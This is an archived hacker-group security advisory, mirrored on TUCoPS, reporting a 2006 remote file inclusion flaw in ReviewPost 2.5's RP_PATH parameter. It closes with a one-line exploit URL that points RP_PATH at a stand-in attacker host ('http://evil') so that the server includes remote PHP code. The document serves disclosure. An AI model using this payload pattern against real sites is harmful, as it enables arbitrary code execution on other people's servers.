TUCoPS :: HP Unsorted R :: b06-4747.htm

ReviewPost 2.5 (RP_PATH) Remote File Inclusion
SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion
SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion


#############################Solpot Crew Community##############################
#
#  ReviewPost 2.5 (RP_PATH) Remote File Inclusion
#
# Donwload File : http://3-bius.com/ReviewPost.zip
#
#################################################################################
#
#
#       Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)
#
# contact: bius@mac.com
#
# Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
#
################################################################################
#
#
#      Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry
#              imam26_it,ant1casper(tolong tambahin ya)
#              #nyubi , #hitamputih @dalnet
#              and all member solpotcrew community
# http://www.nyubicrew.org/forum/
# especially thx to Solpot @ nyubi@dal.net
#
###############################################################################
Input passed to the "RP_PATH" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from index.php



nb : others file has vulnerable too :)

exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil

#############################################################################
######################################E.O.F##################################

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH